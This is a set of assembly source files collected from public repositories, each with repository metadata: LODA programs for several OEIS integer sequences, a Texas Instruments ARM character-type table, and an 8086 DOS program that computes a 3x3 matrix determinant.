MUL $3, $1
|
||||
TheStack | 639283fe99213b0f26ba6a899145c40958df5c2d | Assemblycode:Assembly | {"size": 2372, "ext": "asm", "max_stars_repo_path": "programs/oeis/033/A033591.asm", "max_stars_repo_name": "jmorken/loda", "max_stars_repo_stars_event_min_datetime": "2021-03-15T11:38:20.000Z", "max_stars_repo_stars_event_max_datetime": "2021-03-15T11:38:20.000Z", "max_issues_repo_path": "programs/oeis/033/A033591.asm", "max_issues_repo_name": "jmorken/loda", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "programs/oeis/033/A033591.asm", "max_forks_repo_name": "jmorken/loda", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 1, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 139.5294117647, "max_line_length": 2199, "alphanum_fraction": 0.8570826307} | ; A033591: a(n) = (2*n+1)*(3*n+1)*(4*n+1).
; 1,60,315,910,1989,3696,6175,9570,14025,19684,26691,35190,45325,57240,71079,86986,105105,125580,148555,174174,202581,233920,268335,305970,346969,391476,439635,491590,547485,607464,671671,740250,813345,891100,973659,1061166,1153765,1251600,1354815,1463554,1577961,1698180,1824355,1956630,2095149,2240056,2391495,2549610,2714545,2886444,3065451,3251710,3445365,3646560,3855439,4072146,4296825,4529620,4770675,5020134,5278141,5544840,5820375,6104890,6398529,6701436,7013755,7335630,7667205,8008624,8360031,8721570,9093385,9475620,9868419,10271926,10686285,11111640,11548135,11995914,12455121,12925900,13408395,13902750,14409109,14927616,15458415,16001650,16557465,17126004,17707411,18301830,18909405,19530280,20164599,20812506,21474145,22149660,22839195,23542894,24260901,24993360,25740415,26502210,27278889,28070596,28877475,29699670,30537325,31390584,32259591,33144490,34045425,34962540,35895979,36845886,37812405,38795680,39795855,40813074,41847481,42899220,43968435,45055270,46159869,47282376,48422935,49581690,50758785,51954364,53168571,54401550,55653445,56924400,58214559,59524066,60853065,62201700,63570115,64958454,66366861,67795480,69244455,70713930,72204049,73714956,75246795,76799710,78373845,79969344,81586351,83225010,84885465,86567860,88272339,89999046,91748125,93519720,95313975,97131034,98971041,100834140,102720475,104630190,106563429,108520336,110501055,112505730,114534505,116587524,118664931,120766870,122893485,125044920,127221319,129422826,131649585,133901740,136179435,138482814,140812021,143167200,145548495,147956050,150390009,152850516,155337715,157851750,160392765,162960904,165556311,168179130,170829505,173507580,176213499,178947406,181709445,184499760,187318495,190165794,193041801,195946660,198880515,201843510,204835789,207857496,210908775,213989770,217100625,220241484,223412491,226613790,229845525,233107840,236400879,239724786,243079705,246465780,249883155,253331974,256812381,260324520,263868535,267444570,271052769,274693276,278366235,282071790,285810085,289581264,293385471,297222850,301093545,304997700,308935459,312906966,316912365,320951800,325025415,329133354,333275761,337452780,341664555,345911230,350192949,354509856,358862095,363249810,367673145,372132244
mov $1,1
mov $2,$0
mul $2,9
add $1,$2
mov $3,$0
mul $3,$0
mov $2,$3
mul $2,26
add $1,$2
mul $3,$0
mov $2,$3
mul $2,24
add $1,$2
|
||||
TheStack | 8dbe306f9d8ba7fad0fd6e784f59de3bc8339aeb | Assemblycode:Assembly | {"size": 439, "ext": "asm", "max_stars_repo_path": "oeis/259/A259904.asm", "max_stars_repo_name": "neoneye/loda-programs", "max_stars_repo_stars_event_min_datetime": "2021-08-22T19:44:55.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-20T16:47:57.000Z", "max_issues_repo_path": "oeis/259/A259904.asm", "max_issues_repo_name": "neoneye/loda-programs", "max_issues_repo_issues_event_min_datetime": "2021-08-29T13:15:54.000Z", "max_issues_repo_issues_event_max_datetime": "2022-03-09T19:52:31.000Z", "max_forks_repo_path": "oeis/259/A259904.asm", "max_forks_repo_name": "neoneye/loda-programs", "max_forks_repo_forks_event_min_datetime": "2021-08-22T20:56:47.000Z", "max_forks_repo_forks_event_max_datetime": "2021-09-29T06:26:12.000Z"} | {"max_stars_count": 11, "max_issues_count": 9, "max_forks_count": 3, "avg_line_length": 25.8235294118, "max_line_length": 220, "alphanum_fraction": 0.69476082} | ; A259904: n*a(n+1) = (2*n^2+2n-1)*a(n)+(n+1)*a(n-1); a(0)=0, a(1)=1.
; Submitted by Jon Maiga
; 0,1,3,18,142,1407,16773,233668,3724476,66837885,1333469575,29276505366,701429322378,18210426152443,509246515680777,15260531890180872,487862847976502008,16573059718335854073,596171824656869639691,22638902465293908063130
mov $2,1
mov $4,1
lpb $0
sub $0,1
mov $3,$4
mov $4,$2
mul $2,$0
add $2,$3
add $4,$2
add $2,$4
lpe
mov $0,$3
|
||||
TheStack | a858acaf0ff9e971ea38ceef7d6e9e707daaffc9 | Assemblycode:Assembly | {"size": 9868, "ext": "asm", "max_stars_repo_path": "compiler/ti-cgt-arm_18.12.4.LTS/lib/src/aeabi_ctype.asm", "max_stars_repo_name": "JosiahCraw/TI-Arm-Docker", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "compiler/ti-cgt-arm_18.12.4.LTS/lib/src/aeabi_ctype.asm", "max_issues_repo_name": "JosiahCraw/TI-Arm-Docker", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "compiler/ti-cgt-arm_18.12.4.LTS/lib/src/aeabi_ctype.asm", "max_forks_repo_name": "JosiahCraw/TI-Arm-Docker", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 31.9352750809, "max_line_length": 79, "alphanum_fraction": 0.5027361167} | ;/****************************************************************************/
;/* aeabi_ctype.asm */
;*
;* Copyright (c) 2006 Texas Instruments Incorporated
;* http://www.ti.com/
;*
;* Redistribution and use in source and binary forms, with or without
;* modification, are permitted provided that the following conditions
;* are met:
;*
;* Redistributions of source code must retain the above copyright
;* notice, this list of conditions and the following disclaimer.
;*
;* Redistributions in binary form must reproduce the above copyright
;* notice, this list of conditions and the following disclaimer in
;* the documentation and/or other materials provided with the
;* distribution.
;*
;* Neither the name of Texas Instruments Incorporated nor the names
;* of its contributors may be used to endorse or promote products
;* derived from this software without specific prior written
;* permission.
;*
;* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
;* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
;* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
;* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
;* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
;* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
;* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
;* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
;* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
;* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
;* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;*
;/****************************************************************************/
;/****************************************************************************/
;/* ARM's CLIB ABI (GENC-003539) requires that a conforming toolset to */
;/* supply the following ctype table. */
;/****************************************************************************/
.if !__TI_ARM_V7M__ & !__TI_ARM_V6M0__
.arm
.else
.thumb
.endif
.global __aeabi_ctype_table_
.global __aeabi_ctype_table_C
.sect ".const:__aeabi_ctype_table"
.align 4
__aeabi_ctype_table_:
__aeabi_ctype_table_C:
.field 0,8 ; -1 EOF : 0
.field 128,8 ; 0x00 NUL : _ABI_C
.field 128,8 ; 0x01 SOH : _ABI_C
.field 128,8 ; 0x02 STX : _ABI_C
.field 128,8 ; 0x03 ETX : _ABI_C
.field 128,8 ; 0x04 EOT : _ABI_C
.field 128,8 ; 0x05 ENQ : _ABI_C
.field 128,8 ; 0x06 ACK : _ABI_C
.field 128,8 ; 0x07 BEL : _ABI_C
.field 128,8 ; 0x08 BS : _ABI_C
.field 144,8 ; 0x09 HT : _ABI_C | _ABI_S
.field 144,8 ; 0x0A LF : _ABI_C | _ABI_S
.field 144,8 ; 0x0B VT : _ABI_C | _ABI_S
.field 144,8 ; 0x0C FF : _ABI_C | _ABI_S
.field 144,8 ; 0x0D CR : _ABI_C | _ABI_S
.field 128,8 ; 0x0E SO : _ABI_C
.field 128,8 ; 0x0F SI : _ABI_C
.field 128,8 ; 0x10 DLE : _ABI_C
.field 128,8 ; 0x11 DC1 : _ABI_C
.field 128,8 ; 0x12 DC2 : _ABI_C
.field 128,8 ; 0x13 DC3 : _ABI_C
.field 128,8 ; 0x14 DC4 : _ABI_C
.field 128,8 ; 0x15 NAK : _ABI_C
.field 128,8 ; 0x16 SYN : _ABI_C
.field 128,8 ; 0x17 ETB : _ABI_C
.field 128,8 ; 0x18 CAN : _ABI_C
.field 128,8 ; 0x19 EM : _ABI_C
.field 128,8 ; 0x1A SUB : _ABI_C
.field 128,8 ; 0x1B ESC : _ABI_C
.field 128,8 ; 0x1C FS : _ABI_C
.field 128,8 ; 0x1D GS : _ABI_C
.field 128,8 ; 0x1E RS : _ABI_C
.field 128,8 ; 0x1F US : _ABI_C
.field 24,8 ; 0x20 ' ' : _ABI_S | _ABI_B
.field 4,8 ; 0x21 '!' : _ABI_P
.field 4,8 ; 0x22 '"' : _ABI_P
.field 4,8 ; 0x23 '#' : _ABI_P
.field 4,8 ; 0x24 '$' : _ABI_P
.field 4,8 ; 0x25 '%' : _ABI_P
.field 4,8 ; 0x26 '&' : _ABI_P
.field 4,8 ; 0x27 ''' : _ABI_P
.field 4,8 ; 0x28 '(' : _ABI_P
.field 4,8 ; 0x29 ')' : _ABI_P
.field 4,8 ; 0x2A '*' : _ABI_P
.field 4,8 ; 0x2B '+' : _ABI_P
.field 4,8 ; 0x2C ',' : _ABI_P
.field 4,8 ; 0x2D '-' : _ABI_P
.field 4,8 ; 0x2E '.' : _ABI_P
.field 4,8 ; 0x2F '/' : _ABI_P
.field 2,8 ; 0x30 '0' : _ABI_X
.field 2,8 ; 0x31 '1' : _ABI_X
.field 2,8 ; 0x32 '2' : _ABI_X
.field 2,8 ; 0x33 '3' : _ABI_X
.field 2,8 ; 0x34 '4' : _ABI_X
.field 2,8 ; 0x35 '5' : _ABI_X
.field 2,8 ; 0x36 '6' : _ABI_X
.field 2,8 ; 0x37 '7' : _ABI_X
.field 2,8 ; 0x38 '8' : _ABI_X
.field 2,8 ; 0x39 '9' : _ABI_X
.field 4,8 ; 0x3A ':' : _ABI_P
.field 4,8 ; 0x3B ';' : _ABI_P
.field 4,8 ; 0x3C '<' : _ABI_P
.field 4,8 ; 0x3D '=' : _ABI_P
.field 4,8 ; 0x3E '>' : _ABI_P
.field 4,8 ; 0x3F '?' : _ABI_P
.field 4,8 ; 0x40 '@' : _ABI_P
.field 67,8 ; 0x41 'A' : _ABI_U | _ABI_X
.field 67,8 ; 0x42 'B' : _ABI_U | _ABI_X
.field 67,8 ; 0x43 'C' : _ABI_U | _ABI_X
.field 67,8 ; 0x44 'D' : _ABI_U | _ABI_X
.field 67,8 ; 0x45 'E' : _ABI_U | _ABI_X
.field 67,8 ; 0x46 'F' : _ABI_U | _ABI_X
.field 65,8 ; 0x47 'G' : _ABI_U
.field 65,8 ; 0x48 'H' : _ABI_U
.field 65,8 ; 0x49 'I' : _ABI_U
.field 65,8 ; 0x4A 'J' : _ABI_U
.field 65,8 ; 0x4B 'K' : _ABI_U
.field 65,8 ; 0x4C 'L' : _ABI_U
.field 65,8 ; 0x4D 'M' : _ABI_U
.field 65,8 ; 0x4E 'N' : _ABI_U
.field 65,8 ; 0x4F 'O' : _ABI_U
.field 65,8 ; 0x50 'P' : _ABI_U
.field 65,8 ; 0x51 'Q' : _ABI_U
.field 65,8 ; 0x52 'R' : _ABI_U
.field 65,8 ; 0x53 'S' : _ABI_U
.field 65,8 ; 0x54 'T' : _ABI_U
.field 65,8 ; 0x55 'U' : _ABI_U
.field 65,8 ; 0x56 'V' : _ABI_U
.field 65,8 ; 0x57 'W' : _ABI_U
.field 65,8 ; 0x58 'X' : _ABI_U
.field 65,8 ; 0x59 'Y' : _ABI_U
.field 65,8 ; 0x5A 'Z' : _ABI_U
.field 4,8 ; 0x5B '[' : _ABI_P
.field 4,8 ; 0x5C '\' : _ABI_P
.field 4,8 ; 0x5D ']' : _ABI_P
.field 4,8 ; 0x5E '^' : _ABI_P
.field 4,8 ; 0x5F '_' : _ABI_P
.field 4,8 ; 0x60 '`' : _ABI_P
.field 35,8 ; 0x61 'a' : _ABI_L | _ABI_X
.field 35,8 ; 0x62 'b' : _ABI_L | _ABI_X
.field 35,8 ; 0x63 'c' : _ABI_L | _ABI_X
.field 35,8 ; 0x64 'd' : _ABI_L | _ABI_X
.field 35,8 ; 0x65 'e' : _ABI_L | _ABI_X
.field 35,8 ; 0x66 'f' : _ABI_L | _ABI_X
.field 33,8 ; 0x67 'g' : _ABI_L
.field 33,8 ; 0x68 'h' : _ABI_L
.field 33,8 ; 0x69 'i' : _ABI_L
.field 33,8 ; 0x6A 'j' : _ABI_L
.field 33,8 ; 0x6B 'k' : _ABI_L
.field 33,8 ; 0x6C 'l' : _ABI_L
.field 33,8 ; 0x6D 'm' : _ABI_L
.field 33,8 ; 0x6E 'n' : _ABI_L
.field 33,8 ; 0x6F 'o' : _ABI_L
.field 33,8 ; 0x70 'p' : _ABI_L
.field 33,8 ; 0x71 'q' : _ABI_L
.field 33,8 ; 0x72 'r' : _ABI_L
.field 33,8 ; 0x73 's' : _ABI_L
.field 33,8 ; 0x74 't' : _ABI_L
.field 33,8 ; 0x75 'u' : _ABI_L
.field 33,8 ; 0x76 'v' : _ABI_L
.field 33,8 ; 0x77 'w' : _ABI_L
.field 33,8 ; 0x78 'x' : _ABI_L
.field 33,8 ; 0x79 'y' : _ABI_L
.field 33,8 ; 0x7A 'z' : _ABI_L
.field 4,8 ; 0x7B '{' : _ABI_P
.field 4,8 ; 0x7C '|' : _ABI_P
.field 4,8 ; 0x7D '}' : _ABI_P
.field 4,8 ; 0x7E '~' : _ABI_P
.field 128,8 ; 0x7F DEL : _ABI_C
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
.field 0,8 ;
|
||||
TheStack | ad025b8fd497ec6b07c452c118a6b6573339f2bd | Assemblycode:Assembly | {"size": 11042, "ext": "asm", "max_stars_repo_path": "Determinant.asm", "max_stars_repo_name": "mohammadekhosravi/assembly", "max_stars_repo_stars_event_min_datetime": "2020-08-05T05:43:16.000Z", "max_stars_repo_stars_event_max_datetime": "2021-08-23T20:51:34.000Z", "max_issues_repo_path": "Determinant.asm", "max_issues_repo_name": "mohammadekhosravi/assembly", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "Determinant.asm", "max_forks_repo_name": "mohammadekhosravi/assembly", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": 2, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 21.56640625, "max_line_length": 78, "alphanum_fraction": 0.4357000543} | ; CALCULATE DETERMINANT OF 3*3 MATRIX.
.MODEL SMALL
.DATA
INPUT_ROW DB ? ; CONTAIN INPUT ROW
INPUT_COL DB ? ; CONTAIN INPUT COLUMN
MSG1 DB "ENTER THE MATRIX ELEMENTS: $"
MSG2 DB "ROW$"
MSG3 DB " COL$"
MSG4 DB ": $"
LINE DB "------------------------------------------------------------- $"
MSG5 DB "DETERMINANT IS: $"
NEW_LINE DB 0DH,0AH, '$' ; NEW LINE CODE.
TO_PRINT DB 20 DUP('$')
RESULT LABEL BYTE
MAX DB 150
LEN DB ?
BUFFER DB 150 DUP('?')
RES LABEL BYTE
MAX0 DB 150
LEN0 DB ?
BUFFER0 DB 150 DUP('?')
FIRST_NUM DB ?
SECOND_NUM DB ?
THIRD_NUM DB ?
FOURTH_NUM DB ?
MANFI DB 00H
FIRST_PART DB ?
FIRST_PART_SIGN DB 00H
SECOND_PART DB ?
SECOND_PART_SIGN DB 00H
THIRD_PART DB ?
THIRD_PART_SIGN DB 00H
.CODE
MAIN PROC
MOV AX, @DATA
MOV DS, AX ; INITIALIZATION OF DATA SEGMENT.
LEA DX, MSG1 ; PRINT MSG1 TO STANDARD OUTPUT.
MOV AH, 9
INT 21H
MOV INPUT_ROW, 03H ; STORE INPUT VALUE.
MOV INPUT_COL, 03H ; STORE INPUT VALUE.
; ----------PRINT NEW LINE--------------------------
LEA DX, NEW_LINE ; \n
MOV AH, 9
INT 21H
; --------------RESET ALL REGISTERS-----------------
XOR AX, AX
XOR BX, BX
XOR CX, CX
XOR DX, DX
; --------------GET INPUTS--------------------------
CALL INPUT_ELEMENTS
; CALCULATE DETERMINANT
CALL THREE_D_DETERMINANT
; ----------RETURN CONTROL TO OPERATING SYSTEM------
MOV AX, 4C00H
INT 21H
MAIN ENDP
THREE_D_DETERMINANT PROC
; FIRST PART
MOV SI, 6
MOV AL, RES[SI]
MOV FIRST_NUM, AL; E
MOV SI, 7
MOV AL, RES[SI]
MOV SECOND_NUM, AL; F
MOV SI, 9
MOV AL, RES[SI]
MOV THIRD_NUM, AL; H
MOV SI, 10
MOV AL, RES[SI]
MOV FOURTH_NUM, AL; I
CALL TWO_D_DETERMINANT
MOV FIRST_PART, AL
MOV AL, MANFI
MOV FIRST_PART_SIGN, AL
MOV SI, 2
MOV AL, RES[SI]
MOV BL, FIRST_PART
MUL BL
MOV FIRST_PART, AL
; SECOND PART
MOV SI, 5
MOV AL, RES[SI]
MOV FIRST_NUM, AL; D
MOV SI, 7
MOV AL, RES[SI]
MOV SECOND_NUM, AL; F
MOV SI, 8
MOV AL, RES[SI]
MOV THIRD_NUM, AL; G
MOV SI, 10
MOV AL, RES[SI]
MOV FOURTH_NUM, AL; I
CALL TWO_D_DETERMINANT
MOV SECOND_PART, AL
MOV AL, MANFI
MOV SECOND_PART_SIGN, AL
MOV SI, 3
MOV AL, RES[SI]
MOV BL, SECOND_PART
MUL BL
MOV SECOND_PART, AL
; THIRD PART
MOV SI, 5
MOV AL, RES[SI]
MOV FIRST_NUM, AL; D
MOV SI, 6
MOV AL, RES[SI]
MOV SECOND_NUM, AL; E
MOV SI, 8
MOV AL, RES[SI]
MOV THIRD_NUM, AL; G
MOV SI, 9
MOV AL, RES[SI]
MOV FOURTH_NUM, AL; H
CALL TWO_D_DETERMINANT
MOV THIRD_PART, AL
MOV AL, MANFI
MOV THIRD_PART_SIGN, AL
MOV SI, 4
MOV AL, RES[SI]
MOV BL, THIRD_PART
MUL BL
MOV THIRD_PART, AL
; A - B + C
MOV AL, FIRST_PART_SIGN
CMP AL, 00H
JE P1
JMP N1
P1:
MOV AL, THIRD_PART_SIGN
CMP AL, 00H
JE P1P2
JMP P1N2
P1P2:
MOV AL, FIRST_PART
ADD AL, THIRD_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 00H
JMP CONTINUE
P1N2:
MOV AL, FIRST_PART
CMP AL, THIRD_PART
JA PS1
JMP NS1
PS1:
MOV AL, FIRST_PART
SUB AL, THIRD_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 00H
JMP CONTINUE
NS1:
MOV AL, THIRD_PART
SUB AL, FIRST_PART
MOV AL, FIRST_PART
MOV FIRST_PART_SIGN, 01H
JMP CONTINUE
N1:
MOV AL, THIRD_PART_SIGN
CMP AL, 00H
JE N1P2
JMP N1N2
N1N2:
MOV AL, FIRST_PART
ADD AL, THIRD_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 01H
JMP CONTINUE
N1P2:
MOV AL, FIRST_PART
CMP AL, THIRD_PART
JA NS2
JMP PS2
PS2:
MOV AL, THIRD_PART
SUB AL, FIRST_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 00H
JMP CONTINUE
NS2:
MOV AL, FIRST_PART
SUB AL, THIRD_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 01H
JMP CONTINUE
CONTINUE:
MOV AL, FIRST_PART_SIGN
CMP AL, 00H
JE POS1
JMP NEG1
POS1:
MOV AL, SECOND_PART_SIGN
CMP AL, 00H
JE POS1POS2
JMP POS1NEG2
POS1POS2:
MOV AL, FIRST_PART
CMP AL, SECOND_PART
JA POS1POS2_A
JMP POS1POS2_B
POS1POS2_A:
MOV AL, FIRST_PART
SUB AL, SECOND_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 00H
JMP END_D
POS1POS2_B:
MOV AL, SECOND_PART
SUB AL, FIRST_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 01H
JMP END_D
POS1NEG2:
MOV AL, FIRST_PART
ADD AL, SECOND_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 00H
JMP END_D
NEG1:
MOV AL, SECOND_PART_SIGN
CMP AL, 00H
JE NEG1POS2
JMP NEG1NEG2
NEG1POS2:
MOV AL, FIRST_PART
ADD AL, SECOND_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 01H
JMP END_D
NEG1NEG2:
MOV AL, SECOND_PART
CMP AL, FIRST_PART
JA NEG1NEG2_A
JMP NEG1NEG2_B
NEG1NEG2_A:
MOV AL, SECOND_PART
SUB AL, FIRST_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 00H
JMP END_D
NEG1NEG2_B:
MOV AL, FIRST_PART
SUB AL, SECOND_PART
MOV FIRST_PART, AL
MOV FIRST_PART_SIGN, 01H
JMP END_D
END_D:
LEA DX, NEW_LINE
MOV AH, 9
INT 21H
LEA DX, NEW_LINE
MOV AH, 9
INT 21H
LEA DX, LINE
MOV AH, 9
INT 21H
LEA DX, NEW_LINE
MOV AH, 9
INT 21H
LEA DX, NEW_LINE
MOV AH, 9
INT 21H
LEA DX, MSG5
MOV AH, 9
INT 21H
MOV AL, FIRST_PART_SIGN
CMP AL, 01H
JE PRINT_MINUS
JMP PRINT
PRINT_MINUS:
MOV DL, '-'
MOV AH, 2
INT 21H
PRINT:
LEA SI, TO_PRINT
XOR AX, AX
MOV AL, FIRST_PART
CALL HEX2DEC
LEA DX, TO_PRINT
MOV AH, 9
INT 21H
RET
THREE_D_DETERMINANT ENDP
HEX2DEC PROC ; DO THE MATH
XOR CX, CX
MOV BX, 10
LOOP1:
XOR DX, DX
DIV BX ; REMINDER IS DL(ACCORDING TO 8086 INSTRUCTION SET)
ADD DL, 30H ; CONVERT it to ascii
PUSH DX ; SAVE it in stack
INC CX
CMP AX, 9
JG LOOP1
ADD AL, 30H
MOV [SI], AL
LOOP2:
POP AX
INC SI
MOV [SI], AL
LOOP LOOP2
RET
HEX2DEC ENDP
TWO_D_DETERMINANT PROC
MOV MANFI, 00H
MOV AL, FIRST_NUM
MOV BL, FOURTH_NUM
MUL BL
MOV FIRST_NUM, AL
MOV AL, SECOND_NUM
MOV BL, THIRD_NUM
MUL BL
MOV SECOND_NUM, AL
CMP AL, FIRST_NUM
JA NATIJE_MANFI
MOV AL, FIRST_NUM
SUB AL, SECOND_NUM
JMP END_TWO_D_DETERMINANT
NATIJE_MANFI:
MOV MANFI, 01H
MOV AL, SECOND_NUM
SUB AL, FIRST_NUM
JMP END_TWO_D_DETERMINANT
END_TWO_D_DETERMINANT:
RET
TWO_D_DETERMINANT ENDP
INPUT_ELEMENTS PROC
MOV CL,INPUT_ROW
XOR BX,BX
MOV SI, 2
INPUTELEMENT:
LEA DX, MSG2 ; PRINT MSG3 TO STANDARD OUTPUT.
MOV AH, 9
INT 21H
CALL PRINTNUMBER
LEA DX, MSG3 ; PRINT MSG4 TO STANDARD OUTPUT.
MOV AH, 9
INT 21H
PUSH BX
MOV BL,BH
CALL PRINTNUMBER
POP BX
LEA DX, MSG4 ; PRINT MSG5 TO STANDARD OUTPUT.
MOV AH, 9
INT 21H
MOV AH, 0AH ; READ THE INPUT.
LEA DX, RESULT
INT 21h
PUSH CX
CALL PUSH_NUMBER
POP CX
LEA DX, NEW_LINE ; \n
MOV AH, 9
INT 21H
INC BH
MOV AL,INPUT_COL
CMP BH,AL
JNE INPUTELEMENT
MOV BH,0
INC BL
LOOP INPUTELEMENT
RET
INPUT_ELEMENTS ENDP
PUSH_NUMBER PROC
MOV DI, 2
PUSH_NUMBER_LOOP:
MOV AL,RESULT[DI]
CMP AL, 0DH
JE END_PUSH_NUMBER
SUB AL, 30H
MOV RES[SI], AL
INC SI
INC DI
INC LEN0
JMP PUSH_NUMBER_LOOP
END_PUSH_NUMBER:
RET
PUSH_NUMBER ENDP
PRINTNUMBER PROC
MOV AL, BL
CMP AL, 0
MOV DH, 0
JNE PRINT_ANSWER
MOV AL, '0'
MOV AH, 0EH
INT 10H
JMP FINISH
PRINT_ANSWER:
PUSH AX
MOV AH, 0
CMP AX, 0
JE PRINT_FINAL
MOV DL, 10
DIV DL
INC DH
JMP PRINT_ANSWER
PRINT_FINAL:
POP AX
MOV AL, AH
ADD AL, 30H
MOV AH, 0EH
INT 10H
DEC DH
CMP DH,0
JNE PRINT_FINAL
POP AX
FINISH:
RET
PRINTNUMBER ENDP
END MAIN |
||||
TheStack | 6da0f30a0d6cc38c8d94df4800a19bad2e6787b3 | Assemblycode:Assembly | {"size": 353, "ext": "asm", "max_stars_repo_path": "programs/oeis/023/A023112.asm", "max_stars_repo_name": "neoneye/loda", "max_stars_repo_stars_event_min_datetime": "2018-02-06T19:19:31.000Z", "max_stars_repo_stars_event_max_datetime": "2022-01-17T21:53:31.000Z", "max_issues_repo_path": "programs/oeis/023/A023112.asm", "max_issues_repo_name": "neoneye/loda", "max_issues_repo_issues_event_min_datetime": "2021-02-22T19:00:34.000Z", "max_issues_repo_issues_event_max_datetime": "2021-08-28T10:47:47.000Z", "max_forks_repo_path": "programs/oeis/023/A023112.asm", "max_forks_repo_name": "neoneye/loda", "max_forks_repo_forks_event_min_datetime": "2021-02-24T21:14:16.000Z", "max_forks_repo_forks_event_max_datetime": "2021-08-09T19:48:05.000Z"} | {"max_stars_count": 22, "max_issues_count": 41, "max_forks_count": 5, "avg_line_length": 44.125, "max_line_length": 182, "alphanum_fraction": 0.8385269122} | ; A023112: Squares that remain square when the digit 4 is appended.
; 0,144,207936,299843856,432374632704,623483920515600,899063381008862784,1296448771930859619216,1869478230060918562046976,2695786311299072635612120464,3887321991415032679634115662400
mul $0,2
seq $0,5668 ; Denominators of continued fraction convergents to sqrt(10).
pow $0,2
mul $0,4
|
||||
